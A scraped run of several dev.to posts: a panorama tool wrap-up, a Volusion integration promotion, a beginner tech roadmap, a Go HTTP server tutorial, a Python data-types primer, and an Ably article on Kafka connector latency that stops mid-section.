![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v77nuznau041o72z91ym.png)

### Create project

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cz24fxhg36pd7y2drh7o.png)

### Add image panorama

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ryco5kzgztr10ukfq0q7.png)

The tool has the following features:

- Preview: Preview the panorama, select marker points, and choose the initial view; it also has a function to create a mini map (this feature is not yet fully refined).
- Render: Choose the size of each tile image, then start cropping the panorama image and reformat the entire data structure.
- Export: Export all project data and compress it into a zip file.

# Conclusion

By following the steps outlined in this guide, you can efficiently use the automatic cubemap image cutting tool to process and display high-quality panorama images. The tool's features, including preview, render, and export functionalities, streamline the workflow, saving you time and ensuring optimal image quality for your projects. Whether you are working in tourism, real estate, interior design, or any other field that benefits from panoramic images, this tool will enhance your productivity and improve the user experience.
Explore the possibilities and elevate your projects with this powerful and easy-to-use cubemap image cutting tool. You can find the complete project on [GitHub](https://github.com/nmthangdn2000/panorama-app.git). Thank you for reading! If you found this tool helpful, please give the repository a star. 🌟
nmthangdn2000
1,920,901
pip Trends Newsletter | 13-Jul-2024
This week's pip Trends newsletter is out. Interesting stuff by Stuart Ellis, Gonçalo Valério, Martin...
0
2024-07-13T03:30:00
https://dev.to/tankala/pip-trends-newsletter-13-jul-2024-3gch
programming, python, opensource, news
This week's pip Trends newsletter is out. Interesting stuff by Stuart Ellis, Gonçalo Valério, Martin Heinz, Himani Bansal & Ebo Jackson is covered this week.

{% embed https://newsletter.piptrends.com/p/modern-good-practices-for-python %}
tankala
1,920,933
Make Your Business Grow with Volusion Integration
In the ever-evolving world of eСommerce, integrating software and apps with various shopping...
0
2024-07-16T06:04:28
https://dev.to/api2cartofficial/make-your-business-grow-with-volusion-integration-5han
volusion, integration, ecommerce, saas
In the ever-evolving world of eCommerce, integrating software and apps with various shopping platforms is critical to success. With Volusion integration development, your path to eCommerce success will be clearer and more achievable than ever. This article explores the benefits and processes of Volusion integration, providing valuable insights for software developers and business owners. Let's explore how you can utilize Volusion integration to unlock new opportunities, increase efficiency, and take your business to the next level.

## What is Volusion Integration?

[Volusion](https://www.volusion.com/about) is a popular eCommerce platform that allows businesses to create and manage online stores. Integrating your SaaS app with Volusion can significantly expand your reach and allow you to offer your services to online store owners. This shopping platform powers more than 40,000 online stores.

Volusion integration allows you to streamline your software operations, access Volusion stores, and gain valuable insights into customer behavior. With such an integration, your software will be able to retrieve, update, and delete Volusion data related to orders, prices, categories, and more. Volusion's robust API allows custom integrations tailored to your business needs, ensuring you can leverage its full potential.

Volusion integration development for eCommerce software developers refers to the process of creating seamless connections between the Volusion eCommerce platform and their software systems or applications. This integration enables developers to automate workflows, synchronize data across platforms, and enhance functionality, thereby improving the efficiency of online stores on the Volusion platform.

## Volusion Integration for Your SaaS App

Volusion integration for your [SaaS](https://www.ibm.com/topics/saas) app offers several benefits that streamline business operations and drive growth. Here are some key advantages of integrating Volusion with your SaaS app:

- **Centralized management:** You can manage Volusion e-store product inventory, orders, and customer data directly from your SaaS app. You can easily add, update, or remove products, monitor inventory levels, and track order status, all from one unified dashboard.
- **Seamless order fulfillment:** When a customer places an order on your SaaS app, the integration automatically sends the order details to your clients' Volusion store. From there, you can quickly process and fulfill the order, keeping your customers informed about the status of their shipment. Automating these processes not only reduces errors but also significantly increases efficiency, enhancing customer satisfaction and boosting your team's productivity.
- **Enhanced customer experience:** Customers can browse products, make purchases, and track their orders all within your app. This eliminates the need for customers to navigate to a separate website or platform, improving convenience and reducing friction in the buying process.

## Main difficulties

While Volusion integration offers numerous benefits for your SaaS app, you may encounter some challenges during the integration process. Awareness of these potential difficulties is essential to ensure a smooth integration experience.

- **Technical Complexity:** Depending on the complexity of your app and the specific integration requirements, you may need to invest time and resources to understand Volusion's API documentation and develop the necessary code to establish the connection.
- **Data Mapping and Transformation:** To ensure seamless data flow between Volusion and your app, you may need to perform data mapping and transformation. This involves aligning the data structures and formats between the two systems. It's important to map the fields carefully and ensure data consistency to avoid data loss or inaccuracies.
- **Testing and Troubleshooting:** You may encounter issues during the testing phase that require troubleshooting and debugging. It's essential to allocate sufficient time for testing and have a transparent process to identify and resolve any integration-related issues.
- **Upgrades and Compatibility:** As your SaaS app and Volusion continue to evolve, new versions or updates of Volusion may introduce changes to APIs or data structures that affect the functionality of your integration. So, it's essential to regularly review and update your integration to ensure it remains compatible with the latest version of Volusion.
- **Security and Privacy:** You must ensure that sensitive customer information is transferred and stored securely. Familiarize yourself with Volusion's security measures and protocols to ensure that your integration meets industry best practices and complies with relevant data protection regulations.

## Volusion Integration Development via Third-Party Services

Volusion integration via third-party services enables you to take automation to the next level. **API2Cart is an online service** that provides a single API to **access 40+ shopping carts**. Volusion, with all its versions, is among the [supported platforms](https://api2cart.com/supported-platforms/?utm_source=devto&utm_medium=referral&utm_campaign=volutionintegrationa.nem). This integration opens up possibilities for streamlining your business processes, saving time, and improving efficiency.

API2Cart provides a powerful and flexible solution that simplifies the integration of eCommerce software solutions with the Volusion platform. By using a unified API, software developers can connect their applications to Volusion without the need to delve into the complexities of direct API management. This approach not only saves significant development time but also reduces maintenance costs, as it centralizes the connection to handle data interactions like product management, customer data retrieval, and order synchronization efficiently.

This unified connection method ensures that eCommerce solutions can seamlessly access and manipulate data within the Volusion environment, enhancing the capabilities of eCommerce platforms. As a result, businesses can offer more robust services to their users, such as improved inventory updates, accurate order processing, and enhanced customer analytics. These improvements lead to better customer experiences and operational efficiencies, fostering growth and sustainability in the competitive online retail space.

## Conclusion

Incorporating Volusion integration into your SaaS app can significantly enhance its functionality and appeal, providing users seamless access to powerful eCommerce features. Volusion integration offers many benefits that can drive success for your SaaS app and deliver unparalleled user value.
api2cartofficial
1,921,030
Baby Steps in Tech
Transitioning into tech can be overwhelming, from choosing a programming language to getting the...
0
2024-07-12T20:29:11
https://dev.to/udeze/baby-steps-in-tech-4fo6
programming, beginners, tutorial, productivity
Transitioning into tech can be overwhelming, from choosing a programming language to getting the right resources, meeting the right mentors, and being in the right communities. Tech is an ever-evolving and robust field with plenty of room for you and me to make a career out of it.

> _"The only way to discover the limits of the possible is to go beyond them into the impossible."_ - Arthur C. Clarke

---

This well-curated roadmap will assist you in getting started on your tech journey.

### 1. Recognize your interest

The advancement of technology offers a vast variety of fields, ranging from healthcare to finance, entertainment, agriculture, cyber security, web development, and many more. Dive into these areas to discover what aligns with your passion, interests, and existing skillset.

> **Pro-Tip**💡: _Write down all of your strengths; the more, the better. Next, cross out any abilities that do not align with your long-term objectives and passion. Whatever is left should be your area of concentration. Look up the related tech niche using resources like YouTube and [ChatGPT](https://chatgpt.com/)._

### 2. Acquire the necessary skills

Once you have decided on a professional path to pursue, it is time to arm yourself with the required skills. Although some people prefer in-person instruction, online tutorials and courses are a great place to start. The most important thing is that you have access to learning resources. Many online courses and tutorials provide an easy-to-follow introduction to programming languages, technical concepts, and learning roadmaps.

**Here are a few popular websites to get you started:**

- **YouTube**: Many scholars have praised YouTube as a digital and mobile-friendly school that provides free courses in a variety of subjects and fields to its users. This is the ideal platform to use if you are looking for something inexpensive.
- **SoloLearn**: SoloLearn provides free programming courses for learning how to write code from beginner to advanced levels, including fun bite-sized exercises, lessons, and a user-friendly coding environment.
- **Udemy**: Udemy is a platform that provides learning materials and courses once they have been paid for; the cost of each course ranges from a thousand to a couple of thousand (_check the rate in your local currency_). A certificate is issued upon the successful completion of each course. The intriguing part is that Udemy offers coupon codes that give users some courses for free.
- **Google Cloud Skills Boost**: [Google Cloud Skills Boost](https://www.cloudskillsboost.google/) is a learning platform that allows users to select a career path, develop skills, and earn badges for their achievements. Personally, I recommend using it for its more than 700 bite-sized courses and certifications.

These are only a few of the many options out there.

### 3. Join tech communities:

Finding the right communities can be difficult at first, which is why I am here to help. Tech communities come in many forms: social media groups, forums, meetups, and hackathons. Google search, Slack, and course representatives from different departments at your university can help you locate the closest tech communities, meetups, and social media groups based on your location or place of education.

> **Pro-Tip**💡: _Communities are the best place to learn quickly, ask questions and get feedback, network with like-minded individuals, and volunteer._

### 4. Gain hands-on experience:
While theoretical knowledge is valuable, practical application of what you have learned is essential. Building projects that use your skill set to solve real-world problems is essential to your tech career. Look for ways to put your newfound skills to use, such as working on personal projects or volunteering with open source initiatives. This improves both your comprehension of the material and your ability to collaborate with others.

> **Pro-Tip💡**: _Volunteering with open source initiatives allows you to gain valuable experience that can be added to your resume, curriculum vitae (CV), or LinkedIn. Websites like [GitHub](https://github.com/) and [Open Source Guides](https://opensource.guide/) are great places to start._

### 5. Create a portfolio:

A portfolio is a collection of work samples that demonstrate your technical proficiency and experience. It is critical to demonstrate your skills and abilities to potential employers and persuade them that you are a good fit for the job. Take part in hackathons and boot camps, work on personal projects to demonstrate your grasp of the skills you are learning, and make contributions to open-source initiatives.

### 6. Networking and connection:

The tech industry thrives on collaboration and building connections. Connect with enthusiasts and professionals on platforms like [LinkedIn](https://www.linkedin.com/in/emmanuel-udeze-b53bb7263/) and [X](https://x.com/defno_name) (_formerly Twitter_), and attend industry events and meetups around you to gain insight into the tech landscape and build relationships. The connections made can provide valuable guidance, mentorship, and even job opportunities.

### 7. Applying for jobs with a tech-savvy resume:

Prepare your resume to highlight the tech skills and experiences you have acquired. Emphasize abilities such as collaboration, problem-solving, and communication. To make a good impression on prospective employers, practice answering tech interview questions to hone your interviewing skills.

**Technology is an ever-changing industry. Stay current on trends, innovations, and technologies by reading publications, attending workshops and meetups, and taking online courses. Always ask questions and seek guidance from mentors and colleagues.**
udeze
1,921,154
Making a HTTP server in Go
I've stumbled upon Codecrafters a while ago, and the idea really caught my attention. Making real...
0
2024-07-15T12:44:57
https://dev.to/enzoenrico/making-a-http-server-in-go-1gpo
go, codenewbie, codecrafters, backend
I stumbled upon [Codecrafters](https://codecrafters.io/) a while ago, and the idea really caught my attention. Making real-world projects to learn, instead of following tutorials, is everything I could've asked for when I was getting started. So, to not let the opportunity get away, I'm following their free project on writing an [HTTP server](https://app.codecrafters.io/courses/http-server/).

I'm choosing Go for this project; I've been meaning to learn it fully for a good while now.

## Starting the project

Codecrafters has one of the coolest features I've seen for validating tests: once you commit your code to their repo, tests are automatically run and your progress is validated. So, for this first step, all we have to do is un-comment some of the provided code to create our TCP server:

```go
package main // added so the snippet compiles on its own

import (
	"fmt"
	"net"
	"os"
)

func main() {
	fmt.Println("Logs from your program will appear here!")

	l, err := net.Listen("tcp", "0.0.0.0:4221")
	if err != nil {
		fmt.Println("Failed to bind to port 4221")
		os.Exit(1)
	}

	_, err = l.Accept()
	if err != nil {
		fmt.Println("Error accepting connection: ", err.Error())
		os.Exit(1)
	}
}
```

And everything goes smoothly!

![Terminal Screenshot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ay13elreilrmok17qzux.png)

For this second step, we're returning a response from our server. Codecrafters has this really cool "Task" card that explains everything you need to know to implement the next step.

![Codecrafters screenshot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jcwrnracsok7dzb39a0c.png)

So, we add a variable for our connected client and send it a Status 200:

```go
// added conn for handling responses
con, err := l.Accept()
if err != nil {
	fmt.Println("Error accepting connection: ", err.Error())
	os.Exit(1)
}

// variables for returning the response
var success string = "HTTP/1.1 200 OK\r\n"
var ending string = "\r\n"

// write into the connection
con.Write([]byte(success + ending))
```

## Extracting URL Paths

Now, we need to give a proper response based on the path that is being accessed on our server.
We can identify the path from the first line of the received request, which looks like this:

```
GET /index.html HTTP/1.1
```

And since we're expanding the project scope, I've decided to create a utility package for handling operations like parsing and returning responses

```
/utils/handler.go
```

```go
package utils

import (
	"net"
	"strings"
)

type Handler struct {
	Conn net.Conn
}

func (h *Handler) Success() {
	// variables for returning the response
	var success string = "HTTP/1.1 200 OK\r\n"
	var ending string = "\r\n"
	// write into the connection
	h.Conn.Write([]byte(success + ending))
}

func (h *Handler) NotFound() {
	// variables for returning the response
	var notFound string = "HTTP/1.1 404 Not Found\r\n"
	var ending string = "\r\n"
	// write into the connection
	h.Conn.Write([]byte(notFound + ending))
}

func (h *Handler) Parse(req []byte) []string {
	// read the raw request into the buffer on first use;
	// later calls just re-split the same buffer into lines
	if req[0] == 0 {
		h.Conn.Read(req)
	}
	return strings.Split(string(req), "\r\n")
}
```

And in the main file, we add our connection to our handler and check the path of the request to return our responses

```
server.go
```

```go
// initialize the handler
handler := utils.Handler{Conn: con}
req := make([]byte, 1024)

// parses the request to a readable format
handler.Parse(req)
fmt.Println("Request: ", string(req))

// path checking
if !strings.HasPrefix(string(req), "GET / HTTP/1.1") {
	handler.NotFound()
	return
}

handler.Success()
return
```

## Returning a response

Once again, I feel like I need to refactor my code, not only to add some essentials I've forgotten but also to practice my Clean Code 😆

In the main file, we add a function to handle incoming connections

```
server.go
```

```go
func main() {
	fmt.Println("Starting server on port 4221")

	l, err := net.Listen("tcp", "0.0.0.0:4221")
	if err != nil {
		fmt.Println("Failed to bind to port 4221")
		os.Exit(1)
	}
	// if the handled thread is closed / finished, close the listener
	defer l.Close()

	// keep listening to requests
	for {
		con, err := l.Accept()
		if err != nil {
			fmt.Println("Error accepting connection: ", err.Error())
			os.Exit(1)
		}
		go handleConnection(con)
	}
}

func handleConnection(con net.Conn) {
	// if returned, close the connection
	defer con.Close()

	// initialize the handler
	handler := utils.Handler{Conn: con}
	req := make([]byte, 1024)

	// parse the request
	urlPath := handler.GetURLPath(req)
	fmt.Println("URL Path: ", urlPath)

	if urlPath == "/" {
		handler.Success()
		return
	}

	handler.NotFound()
	return
}
```

And in the handler we've written in the previous step, we add a function to get the URL path of an incoming request

```
/utils/handler.go
```

```go
func (h *Handler) GetURLPath(req []byte) string {
	parsed := h.Parse(req)
	firstheader := strings.Split(parsed[0], " ")
	return firstheader[1]
}
```

For this step, we need to implement the /echo/:message endpoint, which returns whatever message is sent through the URL in the response body. For now, we can add a simple if statement checking the path

```
/app/server.go
```

```go
// parse the request
urlPath := handler.GetURLPath(req)
fmt.Println("URL Path: ", urlPath)

if urlPath == "/" {
	handler.Success()
	return
} else if strings.Split(urlPath, "/")[1] == "echo" {
	msg := strings.Split(urlPath, "/")[2]
	handler.SendBody(msg)
	return
}

handler.NotFound()
return
```

## Reading the User-Agent header

In this step we need to get the data from the 'User-Agent' header and return it in the body of our response.

First of all, we add a route to our server, and while we're at it, we can refactor the 'router' to something a little more readable

```
server.go
```

```go
switch strings.Split(urlPath, "/")[1] {
case "echo":
	msg := strings.Split(urlPath, "/")[2]
	handler.SendBody(msg, len(msg))
	return
case "user-agent":
	// not the prettiest code ever, but hey, it works
	d := handler.UserAgent(req)
	d_msg := strings.Split(d, ": ")[1]
	d_len := len(d_msg)

	fmt.Println(d_msg)
	fmt.Println(d_len)

	handler.SendBody(d_msg, d_len)
	return
default:
	handler.NotFound()
}
```

And we add a new function in our handler to get the needed header value

```
/utils/handler.go
```

```go
// UserAgent returns the User-Agent header from the request.
func (h *Handler) UserAgent(req []byte) string {
	// don't need to read the connection again
	parsed := strings.Split(string(req), "\r\n")
	for i := range parsed {
		if strings.Contains(parsed[i], "User-Agent") {
			return parsed[i]
		}
	}
	return ""
}
```

We also update our _SendBody_ function to get the correct content-length based on a parameter

```go
func (h *Handler) SendBody(message string, msgLen int) {
	//variables for returning response
	var success string = "HTTP/1.1 200 OK\r\n"
	var contentType string = "Content-Type: text/plain\r\n"
	var contentLength string = fmt.Sprintf("Content-Length: %d\r\n", msgLen)
	var ending string = "\r\n"

	returnBody := success + contentType + contentLength + ending + message

	//write into the connection
	h.Conn.Write([]byte(returnBody))
}
```

## Handling concurrency

The next step would be handling multiple connections at the same time, and our code already does that! In our main function, we call the _handleConnection_ function using the **go** keyword, creating a **goroutine** for each connection

```
server.go
```

```go
	//if the handled thread is closed / finished, close the listener
	defer l.Close()

	//keep listening for requests
	for {
		con, err := l.Accept()
		if err != nil {
			fmt.Println("Error accepting connection: ", err.Error())
			os.Exit(1)
		}
		go handleConnection(con)
	}
}
```

## Sending Files

In this step, we implement the _/files/:file_ endpoint. This route returns a file in the body of the response to the user (if the file is found).

To achieve this, we write a function in our _/utils/handler.go_ for sending the file

```
/utils/handler.go
```

```go
func (h *Handler) SendFile(data []byte) {
	//variables for returning response
	var success string = "HTTP/1.1 200 OK\r\n"
	// make sure to use the correct content-type
	var contentType string = "Content-Type: application/octet-stream\r\n"
	var contentLength string = fmt.Sprintf("Content-Length: %v\r\n", len(data))
	var ending string = "\r\n"

	returnBody := success + contentType + contentLength + ending + string(data)

	//write into the connection
	h.Conn.Write([]byte(returnBody))
}
```

And in our main server file, we add a route to our switch statement

```
server.go
```

```go
case "files":
	filename := strings.Split(urlPath, "/")[2]

	//get the folder containing the file
	filepath := os.Args[2]
	fmt.Printf("DIR: %s\n", filepath)

	//create the folder if it doesn't exist
	if _, err := os.ReadDir(filepath); err != nil {
		fmt.Println("Creating directory...")
		os.Mkdir(filepath, 0755)
	}

	fmt.Println("Reading: ", filepath+filename)
	data, err := os.ReadFile(filepath + filename)
	if err != nil {
		fmt.Println("Error on reading file")
		handler.NotFound()
		return
	}

	fmt.Println("Sending file...")
	handler.SendFile(data)
```

## Reading the request body

Our last challenge is reading the body of a POST request.

Using our _/files/:fileName_ endpoint, we should read a POST request and create a file with the file name provided in the URL.
The data provided in the request body then goes into this newly created file.

To achieve this, we add functions to our _/utils/handler.go_ file to get the contents of the request body and the request method, along with a modification to our _SendBody_ function so it can return any status code

```
/utils/handler.go
```

```go
// note: /utils/handler.go now also needs "net/http" in its imports,
// since SendBody uses http.StatusText below

// GetBody returns the last line of the parsed request: the body.
// (careful: Parse reads from the connection; if the request was already
// read into `req`, split the buffer directly instead of reading again)
func (h *Handler) GetBody(req []byte) string {
	parsed := h.Parse(req)
	return parsed[len(parsed)-1]
}

// GetMethod returns the HTTP verb from the request line (GET, POST, ...)
func (h *Handler) GetMethod(req []byte) string {
	parsed := h.Parse(req)
	firstheader := strings.Split(parsed[0], " ")
	return firstheader[0]
}

func (h *Handler) SendBody(message string, msgLen int, stcode int) {
	//variables for returning response
	var success string = fmt.Sprintf("HTTP/1.1 %v %v\r\n", stcode, http.StatusText(stcode))
	var contentType string = "Content-Type: text/plain\r\n"
	var contentLength string = fmt.Sprintf("Content-Length: %v\r\n", msgLen)
	var ending string = "\r\n"

	returnBody := success + contentType + contentLength + ending + message

	//write into the connection
	h.Conn.Write([]byte(returnBody))
}
```

And that's it!! We've made an HTTP server from (almost) scratch, using nothing but the std library in Golang

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9fjcofh268v9vdgh8iqo.png)

I'll definitely make more of those Codecrafters challenges in the future, so stay tuned to see!
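One piece left implicit above is the server-side branch of the files route that ties _GetMethod_, _GetBody_, and the updated _SendBody_ together. Here is a minimal sketch of what it could look like; the method check, the NUL-trimming of the zero-padded read buffer, and parsing the already-read buffer (instead of calling the helpers, which would read the connection a second time) are my assumptions, not code from the original solution:

```go
case "files":
	filename := strings.Split(urlPath, "/")[2]
	filepath := os.Args[2]

	// GetURLPath already read the request into `req`,
	// so parse the buffer directly rather than reading again
	lines := strings.Split(string(req), "\r\n")
	method := strings.Split(lines[0], " ")[0]

	if method == "POST" {
		// the 1024-byte buffer is zero-padded, so trim the trailing NULs
		body := strings.Trim(lines[len(lines)-1], "\x00")

		if err := os.WriteFile(filepath+filename, []byte(body), 0644); err != nil {
			handler.NotFound()
			return
		}

		// 201 Created, with an empty body
		handler.SendBody("", 0, 201)
		return
	}

	// ...the GET handling from the previous step stays here...
```

A quick way to try it (assuming the server was started with the target directory as its second argument): `curl -X POST -d 'hello' http://localhost:4221/files/test.txt` should create `test.txt` inside that directory.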
enzoenrico
1,921,156
Day 3: Data types and variables in python 🧡
You do not need to specify which data type you are assigning to a variable. Python is smart⛓ enough to recognize...
0
2024-07-17T05:08:09
https://dev.to/aryan015/day-3-data-types-and-variables-in-python-3e3j
100daysofcode, python, javascript, java
You do not need to specify which data type you are assigning to a variable. Python is smart⛓ enough to recognize which data type it is holding. We will understand data types and variables hand in hand.

## python variables

A variable in programming (in general) is nothing but a named value that can be reused multiple times in your code.

syntax

```py
# syntax
# variable_name = data
```

Look at the bad example below

```py
# take the user input name
# and append welcome as a prefix
# bad approach that might annoy the user
print("welcome "+input("enter your name"))
print("bye "+input("enter your name"))
# you might save variable space (memory space) but it makes for a bad user experience
```

Now a good example

```py
# good approach
# you might need the username later in the code, so store it once
name = input("enter your name")
print("welcome "+ name)
print("bye "+ name)
# good approach
```

## Variable naming

- follow a consistent [casing style](https://dev.to/aryan015/types-of-casing-in-programming-2j0d) - PEP 8 recommends snake_case for Python variable names.
- a variable name cannot start with a number. `9ty` is invalid.
- the only special symbol allowed is the underscore (_).

all the variables below are valid

```py
user_name = "aryan"
g8 = "aryan"
```

## supported datatypes [important]

I don't want to scare you with a horde of data categories.

```py
# 1. string
# nothing but values between " and '
name = "aryan"

# 2. integer
# a whole number
age = 26
PI = 3.14 # float

# 3. bool
# a value which is either True or False
isQualify = True
canVote = False

# 4. list/array
# a python list can hold multiple values (a container for different data)
fruits = ["apple","Banana🍌","mango"]

# 5. Dictionary
# a datatype that holds key-value pairs
# As of Python 3.7, dictionaries are ordered (items have a defined order).
# In Python 3.6 and earlier, dictionaries are unordered.
# (avoid naming a variable `dict` - it shadows the built-in dict type)
car = {"brand": "Ford", "model": "Mustang", "year": 1964}

# 6. tuple
# an immutable, ordered datatype that can hold any number of values of any type
any_tuple = (1, "hello", 3.14, True, [10, 20])
```

[complete index](https://dev.to/aryan015/100-days-of-python-index-5eh)

[my-linkedin🧡](https://www.linkedin.com/in/aryan-khandelwal-779b5723a/)
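One last quick check: since typing is dynamic, the built-in `type()` function shows what Python inferred for each variable. A small illustrative snippet:

```py
# check what Python inferred with the built-in type() function
name = "aryan"
age = 26
PI = 3.14
is_ready = True

print(type(name))      # <class 'str'>
print(type(age))       # <class 'int'>
print(type(PI))        # <class 'float'>
print(type(is_ready))  # <class 'bool'>

# the same variable can even change its type later
age = "twenty six"
print(type(age))       # <class 'str'>
```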
aryan015
1,921,161
Measuring and minimizing latency in a Kafka Sink Connector
Kafka is often chosen as a solution for realtime data streaming because it is highly scalable,...
0
2024-07-17T07:51:44
https://ably.com/blog/optimizing-kafka-sink-connector-latency
latency, kafka, webdev, news
Kafka is often chosen as a solution for realtime data streaming because it is highly scalable, fault-tolerant, and can operate with low latency even under high load. This has made it popular for companies in the fan engagement space, and in sectors where transactional data is used (e.g., betting), as low latency ensures that actions and responses happen quickly, maintaining the fluidity and immediacy of the experience.

One of the easiest ways for companies to deliver data from Kafka to client devices is by using a Connector. Kafka Connectors act as a bridge between event-driven and non-event-driven technologies, and enable the streaming of data between systems - with ‘Sink Connectors’ taking on the responsibility of streaming data from a particular topic in the Kafka Cluster to external systems using events. Connectors sit within Kafka Connect, which is a tool designed for the scalable and reliable streaming of data between Apache Kafka and other data systems.

![An image showing the relationship between Kafka Connect and Connectors.](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nug7v2on8ipmlxrz5o2r.png)

Unfortunately, traditional approaches to scaling Kafka Connectors and managing extensive loads often prioritize throughput over latency optimization. And the distributed nature of Kafka Connect, together with a Connector's dependency on external services, makes it challenging to optimize end-to-end latency and balance it with throughput. This means that where Kafka has been selected on the basis of its low latency, benefits can be lost when Connectors are introduced. This is particularly problematic in fan engagement applications, and those using transactional data, because latency is critical to their success.

## Solving for low latency with the Ably Kafka Connector

Having worked with businesses like NASCAR, Genius Sports, and Tennis Australia, the engineering teams at Ably understand the importance of low latency. So, to support companies looking to stream data between Kafka and other applications, Ably developed its own Kafka Connector.

Recently, we conducted research to determine the optimal configuration for achieving minimal latency for a Kafka Connector, specifically under a moderate load scenario of between 1,000 and 2,500 messages per second. Let's look at how we achieved this, starting with the challenge of measuring latency and finding bottlenecks.

## Measuring latency and finding bottlenecks

Balancing latency and throughput is a complex task, as improving one often means sacrificing the other. The distributed nature of Kafka Connect and a Connector's dependency on external services make it challenging to understand the impact of your optimizations on end-to-end latency.

To address these challenges, we adopted a comprehensive approach using distributed tracing. Distributed tracing provides a detailed view of a request's journey through various services and components. This end-to-end visibility helps identify where latency is introduced and which components are contributing the most to the overall processing time.

We decided to use OpenTelemetry for distributed tracing. OpenTelemetry is an open-source observability framework that supports over 40 different observability and monitoring tools. It integrates smoothly with various languages and frameworks, both on the frontend and backend, making it an ideal choice for gaining visibility into the end-to-end flow of messages in our Kafka Connect environment.

## How did we trace messages inside the Kafka Connector?

### 1. Instrumenting the load-testing tool
We began by patching our load-testing tool to include OpenTelemetry context in Kafka message headers. This modification allowed us to embed tracing information directly into each message, ensuring that the trace context was carried along with the message throughout its lifecycle.

Distributed tracing relies on context to correlate signals between different services. This context contains information that allows the sending and receiving services to associate one signal with another.

### 2. Enhancing the Kafka Connector

Next, we patched the Kafka connector to extract the OpenTelemetry context from the message headers. The connector was modified to send traces at key points: when a message was queued and when it was published. By instrumenting these stages, we could monitor and measure the time spent within the Kafka connector itself.

### 3. Measuring end-to-end latency

Finally, we extended our client application, which listens to the final Ably messages, to include tracing. By doing so, we could capture the complete end-to-end latency from the moment a message was produced until it was consumed. This comprehensive tracing setup allowed us to pinpoint latency bottlenecks and understand the impact of various optimizations on the overall performance.

### 4. Visualization

To visualize the telemetry data, we used Amazon CloudWatch, which integrates seamlessly with OpenTelemetry. This integration allowed us to collect, visualize, and analyze the traces and metrics with ease:

![Visualizing the telemetry data with Amazon CloudWatch and OpenTelemetry](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zopwxqtvi04ka244tqzj.png)

Although we couldn't find an existing OpenTelemetry library to inject and extract context directly into and from Kafka messages, it was easy to implement this functionality ourselves. We achieved this by implementing simple `TextMapGetter` and `TextMapSetter` interfaces in Java. This custom implementation allowed us to embed and retrieve the tracing context within the Kafka message headers, ensuring that the trace information was properly propagated through our system:

```java
// Implement TextMapGetter to extract telemetry context from Kafka message
// headers
public static final TextMapGetter<SinkRecord> textMapGetter = new TextMapGetter<>() {
    @Override
    public String get(SinkRecord carrier, String key) {
        Header header = carrier.headers().lastWithName(key);
        if (header == null) {
            return null;
        }
        return String.valueOf(header.value());
    }

    @Override
    public Iterable<String> keys(SinkRecord carrier) {
        return StreamSupport.stream(carrier.headers().spliterator(), false)
                .map(Header::key)
                .collect(Collectors.toList());
    }
};

// Implement TextMapSetter to inject telemetry context into Kafka message
// headers
public static final TextMapSetter<SinkRecord> textMapSetter = new TextMapSetter<>() {
    @Override
    public void set(SinkRecord record, String key, String value) {
        record.headers().remove(key).addString(key, value);
    }
};
```

## Fine-tuning with built-in Kafka Connector configuration

With distributed tracing up and running, we were then ready to explore various methods to improve latency in Kafka Connectors.

### Partitioning

One of the initial approaches we considered for reducing latency in Kafka was to increase the number of partitions. A topic partition is a fundamental unit of parallelism in Kafka.
By distributing the load more evenly across multiple partitions, we anticipated that we could significantly reduce message processing times, leading to lower overall latency.

However, during our research, we found out that our clients are not always able to increase the number of partitions due to their application logic constraints. Given these limitations, we decided to shift our focus to other optimization options.

### Number of tasks

After deciding against increasing the number of partitions, we next focused on optimizing the [tasks.max](https://docs.confluent.io/platform/current/installation/configuration/connect/sink-connect-configs.html#tasks-max) option in our Kafka Connector configuration. The `tasks.max` setting controls the maximum number of tasks that the connector can run concurrently. The [tasks](https://docs.confluent.io/platform/current/connect/index.html#connect-tasks) are essentially consumer threads that receive partitions to read from. Our hypothesis was that adjusting this parameter could help us achieve lower latency by running several tasks concurrently.

During our tests, we varied the `tasks.max` value and monitored the resulting latency. Interestingly, we found that the lowest latency was consistently achieved when using a single task. Running multiple tasks did not significantly improve, and in some cases even increased, the latency due to the overhead of managing concurrent processes and potential contention for resources. This outcome suggested that the process of sending data into Ably was the primary factor influencing latency.

### Message converters

In our pursuit of reducing latency, we decided to avoid using complicated converters with schema validation. While these converters ensure data consistency and integrity, they introduce significant overhead due to serialization and deserialization.

Instead, we opted for the built-in string converter, which transfers data as text. By using the string converter, we sent messages in JSON format directly to Ably. This approach proved to be highly efficient, since Ably natively supports JSON, which minimized the overhead associated with serialization and deserialization.

## Improving latency with Ably Connector solutions

After thoroughly exploring built-in Kafka Connector configurations to reduce latency, we turned our attention to optimizing the Kafka Connector itself. First, we focused on the internal batching mechanism of the Ably Kafka Connector. Our goal was to reduce the number of requests sent to Ably, thereby improving performance.

### Experimenting with batching intervals

We conducted experiments with different batching intervals, ranging from 0ms (no batching) to 100ms, using the `batchExecutionMaxBufferSizeMs` option. The objective was to find an optimal batching interval that could potentially reduce the request frequency without adversely affecting latency.

Our tests revealed that even small batching intervals, such as 20ms, increased latency in both the p50 and p99 percentiles across our scenarios. Specifically, we observed that:

- **0ms (no batching):** This configuration yielded the lowest latency, as messages were sent individually without any delay.
- **20ms batching:** Despite the minimal delay, there was a noticeable increase in latency, which impacted both the median (p50) and the higher percentile (p99) latencies.
- **100ms batching:** The latency continued to increase significantly, reinforcing that batching was not beneficial for our use case.
These results indicated that for our specific requirements and testing scenarios, avoiding batching altogether was the most effective approach to maintaining low latency. By sending messages immediately without batching, we minimized the delay introduced by waiting for additional messages to accumulate. ### Internal Connector parallelism Next, we examined the internal thread pool of the Ably Kafka Connector. We observed that messages were often blocked, waiting for previous messages or batches to be sent to Ably. The Ably Kafka Connector has a special option to control thread pool size called `batchExecutionThreadPoolSize`. To address this, we dramatically increased the number of threads from 1 to 1,000 in our tests. This change significantly decreased latency, since it allowed more messages to be processed in parallel. #### Trade-offs and challenges However, this approach came with a trade-off: we could no longer guarantee message ordering when publish requests to Ably were executed in parallel. At Ably, we recognize the critical importance of maintaining message order in realtime data processing. (Many applications rely on messages being processed in the correct sequence to function properly. Therefore, though it would increase latency, `batchExecutionThreadPoolSize` can be set to `1` to guarantee message ordering if absolutely required.) #### Future directions 